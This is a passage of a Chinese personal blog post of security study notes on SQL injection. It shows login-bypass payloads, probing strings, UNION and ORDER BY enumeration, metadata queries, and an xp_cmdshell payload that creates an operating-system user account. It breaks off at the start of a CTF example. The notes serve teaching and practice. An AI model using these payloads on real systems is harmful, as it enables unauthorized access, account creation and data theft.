<!DOCTYPE html><html lang="cn" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>SQL注入 | RngAd33的网络安全笔记</title><link rel="icon" type="image/x-icon" href="/blog233.github.io/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/blog233.github.io/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/blog233.github.io/font/BenderLight.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/blog233.github.io/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/blog233.github.io/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/blog233.github.io/font/Bender.ttf"), url("/blog233.github.io/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/blog233.github.io/font/BenderLight.ttf");
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/blog233.github.io/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><script>var config = {"root":"/blog233.github.io/","search":{"preload":false,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy"}}</script><link type="text/css" rel="stylesheet" href="/blog233.github.io/lib/encrypt/hbe.style.css"><script src="//unpkg.com/mermaid@10.5.0/dist/mermaid.min.js"></script><script src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.6.1/MathJax.js"></script><script>MathJax.Hub.Config({
 menuSettings: {
   zoom: "None"
 },
 showMathMenu: false,
 jax: ["input/TeX","output/CommonHTML"],
 extensions: ["tex2jax.js"],
 TeX: {
   extensions: ["AMSmath.js","AMSsymbols.js"],
   equationNumbers: {
     autoNumber: "AMS"
   }
 },
 tex2jax: {
   inlineMath: [["\\(", "\\)"]],
   displayMath: [["\\[", "\\]"]]
 }
});</script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/blog233.github.io/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/blog233.github.io/font/BenderLight.woff2") format('woff2');
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/blog233.github.io/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
 --dark-background: url('/blog233.github.io/img/bg.webp');
 --light-background: url('/blog233.github.io/img/bk.webp');
 --theme-encrypt-confirm: 'confirm'
}</style><script defer src="/blog233.github.io/js/arknights.js"></script><script defer src="/blog233.github.io/js/search.js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.6.1/MathJax.js"></script><script>MathJax.Hub.Config({
  menuSettings: {
    zoom: "None"
  },
  showMathMenu: false,
  jax: ["input/TeX","output/CommonHTML"],
  extensions: ["tex2jax.js"],
  TeX: {
    extensions: ["AMSmath.js","AMSsymbols.js"],
    equationNumbers: {
      autoNumber: "AMS"
    }
  },
  tex2jax: {
    inlineMath: [["\\(", "\\)"]],
    displayMath: [["\\[", "\\]"]]
  }
});
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/blog233.github.io/lib/encrypt/hbe.js"></script><script async src="/blog233.github.io/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.busuanzi'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/blog233.github.io/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/blog233.github.io/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>SQL注入</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2024-10-26T09:03:22.836Z" id="date"> 2024-10-26</time></div></span><br><span>Last Update: <div class="control"><time datetime="2024-12-22T10:40:54.404Z" id="updated"> 2024-12-22</time></div></span></div></div><hr><div id="post-content"><p>安全无止境，继续前进吧！</p>
<p>SQL注入，作为危害性强的漏洞之一，造成的后果相当严重，<br>小到信息泄露，大到系统损毁……<br>你问我怎么知道这些？学的。<br>原因？……请不要追问。<br>–by Texas</p>
<p class='item-img' data-src='/blog233.github.io/./img/IMG_20241104_163305_423.webp'><img src="/blog233.github.io/./img/IMG_20241104_163305_423.webp"></p>
<p><strong>细节决定成败，SQL注入玩的就是不严谨的前后端交互</strong></p>
<h1 id="热身：万能密码绕过"><a href="#热身：万能密码绕过" class="headerlink" title="热身：万能密码绕过"></a>热身：万能密码绕过</h1><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs sql">原验证登陆语句：<br>    <span class="hljs-keyword">SELECT</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">FROM</span> admin <span class="hljs-keyword">WHERE</span> Username<span class="hljs-operator">=</span> <span class="hljs-string">&#x27;&quot;.$username.&quot;&#x27;</span> <span class="hljs-keyword">AND</span> Password<span class="hljs-operator">=</span> <span class="hljs-string">&#x27;&quot;.md5($password).&quot;&#x27;</span><br><br>payload：<br>    <span class="hljs-number">1</span><span class="hljs-string">&#x27; or &#x27;</span><span class="hljs-number">1</span><span class="hljs-string">&#x27;=&#x27;</span><span class="hljs-number">1</span><br>    <span class="hljs-number">1</span><span class="hljs-string">&#x27; or 1=1 or &#x27;</span><span class="hljs-number">1</span><span class="hljs-string">&#x27;=&#x27;</span><span class="hljs-number">1</span><br><br>注入后的语句：<br>    <span class="hljs-keyword">SELECT</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">FROM</span> admin <span class="hljs-keyword">WHERE</span> Username<span class="hljs-operator">=</span><span class="hljs-string">&#x27;1&#x27;</span> <span class="hljs-keyword">OR</span> <span class="hljs-string">&#x27;1&#x27;</span><span class="hljs-operator">=</span><span class="hljs-string">&#x27;1&#x27;</span> <span class="hljs-keyword">AND</span> Password<span class="hljs-operator">=</span><span class="hljs-string">&#x27;EDFKGMZDFSDFDSFRRQWERRFGGG&#x27;</span><br>    <span class="hljs-keyword">SELECT</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">FROM</span> admin <span class="hljs-keyword">WHERE</span> Username<span class="hljs-operator">=</span><span class="hljs-string">&#x27;1&#x27;</span> <span class="hljs-keyword">OR</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">OR</span> <span class="hljs-string">&#x27;1&#x27;</span><span class="hljs-operator">=</span><span class="hljs-string">&#x27;1&#x27;</span> <span class="hljs-keyword">AND</span> Password<span class="hljs-operator">=</span><span class="hljs-string">&#x27;EDFKGMZDFSDFDSFRRQWERRFGGG&#x27;</span><br></code></pre></td></tr></table></figure>
<p>注入后，不论密码是否正确，1&#x3D;1 or ‘1’&#x3D;’1’永远成立，成功绕过密码环节；</p>
<h1 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h1><ol>
<li><p>可控参数<br> Web应用系统的许多功能需要前后端交互，如果没有对参数进行安全测试，就可能会出现注入漏洞；</p>
</li>
<li><p>参数未过滤或者过滤不严谨<br> 没有对交互过程进行威胁内容过滤，很可能造成注入漏洞；</p>
</li>
<li><p>前后端交互<br> 与数据库交互，这种行为本身就可能存在注入漏洞；</p>
</li>
</ol>
<h1 id="注入类型"><a href="#注入类型" class="headerlink" title="注入类型"></a>注入类型</h1><h2 id="数字型注入"><a href="#数字型注入" class="headerlink" title="数字型注入"></a>数字型注入</h2><p>一般出现在弱类型语言（如ASP、PHP等）中，因为这种语言会自动推导变量类型；<br>而对于强类型语言（如Java、C#等），普通的类型转换会抛出异常而无法继续执行，所以一般不存在数字型注入漏洞。<br>当传入的参数为整型变量时，若存在注入漏洞，则一般是数值型注入漏洞。</p>
<p>数字型注入典型示例代码：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql">$id<span class="hljs-operator">=</span>$_get[<span class="hljs-string">&#x27;id&#x27;</span>];<br>$<span class="hljs-keyword">sql</span><span class="hljs-operator">=</span>&quot;select * from user where id=$id limit 0,1&quot;; <br>$<span class="hljs-keyword">result</span><span class="hljs-operator">=</span>mysql_query($<span class="hljs-keyword">sql</span>);<br>$<span class="hljs-type">row</span><span class="hljs-operator">=</span>mysql_fetch_array[$<span class="hljs-keyword">result</span>];<br></code></pre></td></tr></table></figure>

<h2 id="字符型注入"><a href="#字符型注入" class="headerlink" title="字符型注入"></a>字符型注入</h2><p>进行字符型注入，必须注意字符闭合问题；<br>字符型注入典型示例代码：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql">$id<span class="hljs-operator">=</span>$_get[<span class="hljs-string">&#x27;id&#x27;</span>];<br>$<span class="hljs-keyword">sql</span><span class="hljs-operator">=</span>&quot;select * from user where id=&#x27;$id&#x27; limit 0,1&quot;; <br>$<span class="hljs-keyword">result</span><span class="hljs-operator">=</span>mysql_query($<span class="hljs-keyword">sql</span>);<br>$<span class="hljs-type">row</span><span class="hljs-operator">=</span>mysql_fetch_array[$<span class="hljs-keyword">result</span>];<br></code></pre></td></tr></table></figure>

<h2 id="搜索型注入"><a href="#搜索型注入" class="headerlink" title="搜索型注入"></a>搜索型注入</h2><h1 id="探测芝士"><a href="#探测芝士" class="headerlink" title="探测芝士"></a>探测芝士</h1><h2 id="页面比较法"><a href="#页面比较法" class="headerlink" title="页面比较法"></a>页面比较法</h2><p>利用SQL语句构造恒真、恒假两种不同状态，<br>如果目标存在SQL注入漏洞，那么恒真状态不会对网页内容产生较大改变，但恒假状态会明显改变网页内容，<br>通过比较两个网页的相似程度（可借助页面相似度算法），就可以判定页面是否存在注入漏洞；</p>
<h3 id="数字型注入-1"><a href="#数字型注入-1" class="headerlink" title="数字型注入"></a>数字型注入</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-number">1.</span> 单引号判断法：<br>url<span class="hljs-operator">/</span>xxx.php?id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-string">&#x27;          # 若页面返回错误，则当前网页存在SQL注入&#x27;</span><br><br><span class="hljs-number">2.</span> 恒真状态：<br>url<span class="hljs-operator">/</span>xxx.php?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span><span class="hljs-number">1</span>   # 若页面正常执行，则当前网页存在<span class="hljs-keyword">SQL</span>注入<br><br><span class="hljs-number">3.</span> 恒假状态：<br>url<span class="hljs-operator">/</span>xxx.php?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span><span class="hljs-number">2</span>   # 若页面返回错误，则当前网页存在<span class="hljs-keyword">SQL</span>注入<br></code></pre></td></tr></table></figure>
<h3 id="字符型注入-1"><a href="#字符型注入-1" class="headerlink" title="字符型注入"></a>字符型注入</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-number">1.</span> 单引号判断法：<br>url<span class="hljs-operator">/</span>xxx.php?id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-string">&#x27;   # 若页面返回错误，则当前网页存在SQL注入&#x27;</span><br><br><span class="hljs-number">2.</span> 恒真状态：<br>url<span class="hljs-operator">/</span>xxx.php?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> <span class="hljs-string">&#x27;1&#x27;</span><span class="hljs-operator">=</span><span class="hljs-string">&#x27;1   # 若页面正常执行，则当前网页存在SQL注入&#x27;</span><br><br><span class="hljs-number">3.</span> 恒假状态：<br>url<span class="hljs-operator">/</span>xxx.php?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> <span class="hljs-string">&#x27;1&#x27;</span><span class="hljs-operator">=</span><span class="hljs-string">&#x27;2   # 若页面返回错误，则当前网页存在SQL注入&#x27;</span><br></code></pre></td></tr></table></figure>
<h3 id="搜索型注入-1"><a href="#搜索型注入-1" class="headerlink" title="搜索型注入"></a>搜索型注入</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-number">1.</span> 单引号判断法：<br>url<span class="hljs-operator">/</span>xxx.php?id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-operator">%</span><span class="hljs-string">&#x27;   # 若页面返回错误，则当前网页存在SQL注入&#x27;</span><br><br><span class="hljs-number">2.</span> 恒真状态：<br>url<span class="hljs-operator">/</span>xxx.php?id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-operator">%</span><span class="hljs-string">&#x27; and 1=1 and &#x27;</span><span class="hljs-operator">%</span><span class="hljs-string">&#x27;=&#x27;</span>   # 若页面正常执行，则当前网页存在<span class="hljs-keyword">SQL</span>注入<br><br><span class="hljs-number">3.</span> 恒假状态：<br>url<span class="hljs-operator">/</span>xxx.php?id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-operator">%</span><span class="hljs-string">&#x27; and 1=2 and &#x27;</span><span class="hljs-operator">%</span><span class="hljs-string">&#x27;=&#x27;</span>   # 若页面返回错误，则当前网页存在<span class="hljs-keyword">SQL</span>注入<span class="hljs-string">&#x27;</span><br></code></pre></td></tr></table></figure>
<h2 id="时间比较法"><a href="#时间比较法" class="headerlink" title="时间比较法"></a>时间比较法</h2><h1 id="注入芝士-通用篇"><a href="#注入芝士-通用篇" class="headerlink" title="注入芝士-通用篇"></a>注入芝士-通用篇</h1><p>以下注入步骤基本适用于所有数据库语言，只是不同数据库语言之间语法上存在一些差异；</p>
<h2 id="错误信息收集"><a href="#错误信息收集" class="headerlink" title="错误信息收集"></a>错误信息收集</h2><pre><code>SQL Server能够准确定位错误信息，黑客可以利用错误信息提取数据，便于进行报错注入；
</code></pre>
<h2 id="获取元数据"><a href="#获取元数据" class="headerlink" title="获取元数据"></a>获取元数据</h2><ol>
<li>使用信息数据库INFORMATION_SCHEMA查询数据库名：<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> SCHEMA_NAME <span class="hljs-keyword">FROM</span> INFORMATION_SCHEMA.SCHEMATA LIMIT <span class="hljs-number">0</span>,<span class="hljs-number">1</span><br></code></pre></td></tr></table></figure></li>
<li>查询当前数据库表：<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> TABLE_NAME <span class="hljs-keyword">FROM</span> INFORMATION_SCHEMA.TABLES <span class="hljs-keyword">WHERE</span> TABLE_SCHEMA<span class="hljs-operator">=</span>(<span class="hljs-keyword">SELECT</span> DATABASE()) LIMIT <span class="hljs-number">0</span>,<span class="hljs-number">1</span><br></code></pre></td></tr></table></figure></li>
<li>查询指定表的所有字段：<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">SELECT</span> COLUMN_NAME <span class="hljs-keyword">FROM</span> INFORMATION_SCHEMA.COLUMNS <span class="hljs-keyword">WHERE</span> TABLE_NAME<span class="hljs-operator">=</span><span class="hljs-string">&#x27;XXX&#x27;</span> LIMIT <span class="hljs-number">0</span>,<span class="hljs-number">1</span><br></code></pre></td></tr></table></figure></li>
</ol>
<h2 id="Order-by语句"><a href="#Order-by语句" class="headerlink" title="Order by语句"></a>Order by语句</h2><p>用于判断表列数；<br>举个例子：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs sql">正常语句：<br>    <span class="hljs-keyword">select</span> id,username,password, <span class="hljs-keyword">from</span> users <span class="hljs-keyword">where</span> id <span class="hljs-operator">=</span> <span class="hljs-number">1</span><br>按第一列排序（正常）：<br>    <span class="hljs-keyword">select</span> id,username,password, <span class="hljs-keyword">from</span> users <span class="hljs-keyword">where</span> id <span class="hljs-operator">=</span> <span class="hljs-number">1</span> <span class="hljs-keyword">Order</span> <span class="hljs-keyword">by</span> <span class="hljs-number">1</span><br>按第二列排序（正常）：<br>    <span class="hljs-keyword">select</span> id,username,password, <span class="hljs-keyword">from</span> users <span class="hljs-keyword">where</span> id <span class="hljs-operator">=</span> <span class="hljs-number">1</span> <span class="hljs-keyword">Order</span> <span class="hljs-keyword">by</span> <span class="hljs-number">2</span><br>按第三列排序（正常）：<br>    <span class="hljs-keyword">select</span> id,username,password, <span class="hljs-keyword">from</span> users <span class="hljs-keyword">where</span> id <span class="hljs-operator">=</span> <span class="hljs-number">1</span> <span class="hljs-keyword">Order</span> <span class="hljs-keyword">by</span> <span class="hljs-number">3</span><br>按第四列排序（异常！）：<br>    <span class="hljs-keyword">select</span> id,username,password, <span class="hljs-keyword">from</span> users <span class="hljs-keyword">where</span> id <span class="hljs-operator">=</span> <span class="hljs-number">1</span> <span class="hljs-keyword">Order</span> <span class="hljs-keyword">by</span> <span class="hljs-number">4</span><br>    消息<span class="hljs-number">108</span>，级别<span class="hljs-number">16</span>，状态<span class="hljs-number">1</span>，第<span class="hljs-number">1</span>行<br>    <span class="hljs-keyword">ORDER</span> <span class="hljs-keyword">BY</span> 位置号 <span class="hljs-number">4</span> 超出了选择列表中项数的范围。<br>    <br>由此可以判断出表的行数为<span class="hljs-number">3</span>；<br></code></pre></td></tr></table></figure>

<h2 id="UNION查询（联合查询注入）"><a href="#UNION查询（联合查询注入）" class="headerlink" title="UNION查询（联合查询注入）"></a>UNION查询（联合查询注入）</h2><p>当SQL查询结果可以通过UNION SELECT语句与其他查询结果合并时，可以插入恶意的UNION SELECT语句来尝试检索额外的数据库信息；</p>
<h3 id="探测字段数（表列数）"><a href="#探测字段数（表列数）" class="headerlink" title="探测字段数（表列数）"></a>探测字段数（表列数）</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span> id,username,password, <span class="hljs-keyword">from</span> users <span class="hljs-keyword">where</span> id <span class="hljs-operator">=</span> <span class="hljs-number">1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-keyword">null</span><br><span class="hljs-keyword">select</span> id,username,password, <span class="hljs-keyword">from</span> users <span class="hljs-keyword">where</span> id <span class="hljs-operator">=</span> <span class="hljs-number">1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-keyword">null</span>,<span class="hljs-keyword">null</span><br><span class="hljs-keyword">select</span> id,username,password, <span class="hljs-keyword">from</span> users <span class="hljs-keyword">where</span> id <span class="hljs-operator">=</span> <span class="hljs-number">1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-keyword">null</span>,<span class="hljs-keyword">null</span>,<span class="hljs-keyword">null</span><br><br>另一种写法（不建议这样写，在有些语言中会出现类型不兼容的问题）：<br><span class="hljs-keyword">select</span> id,username,password, <span class="hljs-keyword">from</span> users <span class="hljs-keyword">where</span> id <span class="hljs-operator">=</span> <span class="hljs-number">1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span><br></code></pre></td></tr></table></figure>
<p>如果出错，继续递归查询，直到没有错误产生；</p>
<h3 id="查询敏感信息"><a href="#查询敏感信息" class="headerlink" title="查询敏感信息"></a>查询敏感信息</h3><p>在已知表列数x时，可以使用以下语句继续注入（报错就切换’x’的位置）：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs sql"># 假设表列数为<span class="hljs-number">4</span>：<br><span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-string">&#x27;x&#x27;</span>,<span class="hljs-keyword">null</span>,<span class="hljs-keyword">null</span>,<span class="hljs-keyword">null</span> <span class="hljs-keyword">from</span> sysobject <span class="hljs-keyword">where</span> xtype<span class="hljs-operator">=</span><span class="hljs-string">&#x27;U&#x27;</span><br><span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-keyword">null</span>,<span class="hljs-string">&#x27;x&#x27;</span>,<span class="hljs-keyword">null</span>,<span class="hljs-keyword">null</span> <span class="hljs-keyword">from</span> sysobject <span class="hljs-keyword">where</span> xtype<span class="hljs-operator">=</span><span class="hljs-string">&#x27;U&#x27;</span><br><span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-keyword">null</span>,<span class="hljs-keyword">null</span>,<span class="hljs-string">&#x27;x&#x27;</span>,<span class="hljs-keyword">null</span> <span class="hljs-keyword">from</span> sysobject <span class="hljs-keyword">where</span> xtype<span class="hljs-operator">=</span><span class="hljs-string">&#x27;U&#x27;</span><br><span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-keyword">null</span>,<span class="hljs-keyword">null</span>,<span class="hljs-keyword">null</span>,<span class="hljs-string">&#x27;x&#x27;</span> <span class="hljs-keyword">from</span> sysobject <span class="hljs-keyword">where</span> xtype<span class="hljs-operator">=</span><span class="hljs-string">&#x27;U&#x27;</span><br></code></pre></td></tr></table></figure>
<p>当语句执行正常时，说明数据类型兼容，可以将’x’替换为SQL语句查询敏感信息；</p>
<h2 id="危险函数"><a href="#危险函数" class="headerlink" title="危险函数"></a>危险函数</h2><p>SQL Server的一些危险函数：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span> suser_name()：返回用户的登录标识名；<br><br><span class="hljs-keyword">select</span> user_name()：基于指定的标识号返回数据库用户名；<br><br><span class="hljs-keyword">select</span> db_name()：返回数据库名称；<br><br><span class="hljs-keyword">select</span> is_member(<span class="hljs-string">&#x27;db_owner&#x27;</span>)：判断是否为数据库角色；<br><br><span class="hljs-keyword">select</span> <span class="hljs-keyword">convert</span>(<span class="hljs-type">int</span>, <span class="hljs-string">&#x27;5&#x27;</span>)：数据类型转换；<br></code></pre></td></tr></table></figure>
<h2 id="危险存储过程"><a href="#危险存储过程" class="headerlink" title="危险存储过程"></a>危险存储过程</h2><p>存储过程是指大型数据库系统中用于完成特定功能的一组“SQL函数”；<br>黑客最常使用”xp_cmdshell”存储过程，该存储过程允许用户执行系统命令；</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs sql">payload:<br>    ?id<span class="hljs-operator">=</span><span class="hljs-number">1</span>; <span class="hljs-keyword">exec</span> xp_cmdshell <span class="hljs-string">&#x27;net user test test /add&#x27;</span><br><br>最终执行<span class="hljs-keyword">SQL</span>语句：<br>    <span class="hljs-keyword">select</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">from</span> <span class="hljs-keyword">table</span> <span class="hljs-keyword">where</span> id<span class="hljs-operator">=</span><span class="hljs-number">1</span>; <span class="hljs-keyword">exec</span> xp_cmdshell <span class="hljs-string">&#x27;net user test test /add&#x27;</span><br></code></pre></td></tr></table></figure>
<p>此外，黑客也可能会自行编写存储过程，比如I&#x2F;O操作（文件读&#x2F;写）；<br><strong>注意：任何数据库在使用特殊存储过程时，都需要有特定的权限，否则无法使用</strong></p>
<h2 id="动态执行"><a href="#动态执行" class="headerlink" title="动态执行"></a>动态执行</h2><p>SQL Server支持动态执行语句，<br>用户可以提交一个字符串来执行SQL语句；</p>
<h1 id="注入芝士-MySQL特辑"><a href="#注入芝士-MySQL特辑" class="headerlink" title="注入芝士-MySQL特辑"></a>注入芝士-MySQL特辑</h1><p><strong>大部分网站均采用MySQL作为主流数据库语言，所以单独研究它是很有必要的</strong></p>
<h2 id="MySQL注释"><a href="#MySQL注释" class="headerlink" title="MySQL注释"></a>MySQL注释</h2><p>MySQL支持以下三种注释：</p>
<ol>
<li><p>#：注释其后的所有语句；</p>
</li>
<li><p>-- （此处有空格或Tab）：注释其后的所有语句；<br> 在传输过程中，空格往往被忽略掉，’+’会被解释成空格，所以一般改用’–+’；</p>
</li>
<li><p>&#x2F;**&#x2F;：注释其中的所有内容；</p>
</li>
</ol>
<h2 id="显错式注入"><a href="#显错式注入" class="headerlink" title="显错式注入"></a>显错式注入</h2><p>利用数据库的某些机制，人为地制造错误条件，使得查询结果能够出现在错误信息中；<br>通过观察数据库错误消息中的敏感信息，推断数据库结构或内容；<br>适用于联合查询不可用的时候，但仍然依赖于一些关键函数（过滤后失效）；</p>
<h2 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h2><p>由编码方式不统一所造成，一般出现在PHP+MySQL当中；<br>在PHP的配置文件php.ini中，存在magic_quotes_gpc选项（魔术引号），<br>当此选项启用时，所有使用GET、POST、Cookie接收的&#39;、&quot;、\和NULL都会被自动添加转义符号’\‘；</p>
<p>使用“%1$ + 字符”可以消除字符前自动添加的转义符号’\‘（与sprintf()格式化字符串漏洞的利用方法相似）；<br>不妨引入一个例子（CTFshow_Web_萌新赛_给她，分值：1）：</p>
